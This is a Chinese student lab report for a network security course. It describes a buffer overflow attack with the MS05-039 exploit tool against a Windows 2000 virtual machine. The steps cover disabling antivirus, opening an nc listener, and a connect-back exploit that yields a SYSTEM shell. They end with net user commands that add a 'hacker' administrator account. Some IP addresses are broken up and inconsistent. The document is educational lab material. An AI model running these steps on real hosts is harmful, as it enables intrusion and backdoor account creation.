还剩3页未读,继续阅读
文本内容:
《计算机网络安全》实验报告实验序号6 实验项目名称缓冲区溢出攻击与防范实验学号姓名专业、班实验地点实1-411指导教师实验时间2011-11-15
一、实验目的及要求通过实验掌握缓冲区溢出的原理;通过使用缓冲区溢出攻击软件模拟入侵远程主机;理解缓冲区溢出危险性;理解防范和避免缓冲区溢出攻击的措施
二、实验设备(环境)及要求Windows2000server,虚拟机.本实验需要用到虚拟机,因此每台实验主机都通过__软件WMwareWorkstation分割出了虚拟机真实主机P1的配置为操作系统Windows2000serverSP0或者windowsXPsp2,并且__ms05-
039.exe缓冲区溢出攻击软件虚拟机P2配置为操作系统Windows2000ServerSP0(没有另外打补丁,存在ms05039漏洞)3实验网络拓扑图
三、实验内容与步骤缓冲区溢出攻击之所以成为一种常见的攻击手段,其原因在于缓冲区溢出漏洞太普通了,并且易于实现而且,缓冲区溢出所以成为远程攻击的主要手段,其原因在于缓冲区溢出漏洞给予了攻击者所想要的一切植入并且执行攻击代码被植入的攻击代码以一定的权限运行有缓冲区溢出漏洞的程序,从而得到被攻击主机的控制权实验任务利用ms05-039溢出漏洞攻击MS05-039漏洞是MicrosoftWindows即插即用功能远程缓冲区溢出漏洞MicrosoftWindows即插即用(PnP)功能允许操作系统在__新硬件时能够检测到这些设备MicrosoftWindows即插即用功能中存在缓冲区溢出漏洞,造成该漏洞的原因是PlugandPlay服务中有未经检查的缓冲区成功利用这个漏洞的攻击者可以完全控制受影响的系统这是一个严重的安全漏洞,成功的攻击者可以完全控制被攻击的计算机这个漏洞既可以用来远程溢出(只适用于目标系统是2000和xpsp1),也可以用来本地提升权限(2000以上版本都可以)而且溢出成功后会得到一个SYSTEM权限的shell本实验是在主机上利用ms05-039溢出工具对虚拟机上的ms05039漏洞进行溢出攻击,入侵成功后获得系统的控制权1)入侵准备工作这是一个远程执行代码和本地特权提升漏洞在Windows2000上,匿名攻击者可能试图远程利用此漏洞在WindowsXPServi__Pack1上,只有经身份验证的用户可试图远程利用此漏洞在WindowXPServi__Pack2和WindowsServer2003上,只有___才能远程访问受影响的组件成功利用此漏洞的攻击者可完全控制受影响的系统攻击者可随后__程序,查看、更改或删除数据,或者创建拥有完全用户权限的新帐户
(1)关闭本机(攻击主机)上的杀毒软件和防火墙软件,确保实验软件能够运行;
(2)运行nc.exe在本地进行监听nc–vv–l–p99,如图2图2运行nc进行监听2)对远程主机进ms05-039漏洞进行入侵实验在命令行下进行,具体操作如下
(1)运行ms05039scan.exe如图3,设定探测目标
172.
16.
167.103(实验中以实际虚拟机为准)图3ms05039扫描
(2)__“”按钮;
(3)运行结束后查看结果,此例中表明目标主机有该漏洞,可以进行下一步攻击3)攻击
(1)在dos下运行ms05039攻击程序ms
0539.exems
0539.exe是一个利用远程主机ms05-039漏洞进行溢出的工具,它在命令行下使用,使用格式如下ms
05039.exehostconIPconPort[target]其中host:目标主机地址conIP回连ip地址,一般就是本地主机ip地址onPort回连端口,如该实验中的“99”target目标系统类型,缺省为1系统类型有两种0Englishwin2ksp41Chinesewin2ksp4我们在命令行下输入ms
05039.exe
172.
16.
167.
101172.
16.
167.151,(这表示对
172.
16.
167.103进行远程溢出,溢出后返回的ip是
172.
16.
167.103,返回端口是99,远程主机的操作系统类型是Chinesewin2ksp4),如图4所示图4执行ms05039攻击
(2)检查我们刚才运行nc的dos窗口,若出现图5所示,则表明攻击成功此dos窗口中运行的任何命令都是在目标主机上运行,相当于在目标主机本机上开一个dos窗口运行程序一样图5攻击成功的结果
(3)验证运行netuserhacker/add和netlocalgroupadministratorshacker/add验证攻击者运行程序的权限,若成功则表明有超级用户权限成功后可以在目标主机上验证是否添加了用户
四、实验结果与数据处理如以上分析结果所示
五、分析与讨论通过本次实验基本的掌握缓冲区溢出的原理,知道它是怎样进行攻击的也能够通过使用缓冲区溢出攻击软件模拟入侵远程主机;明白了缓冲区溢出危险性;并且能够正确的防范和避免缓冲区溢出攻击的措施在不断的实验中累计了经验,以后遇到这方面的事情处理起来会更加的顺畅
六、教师评语签名日期成绩。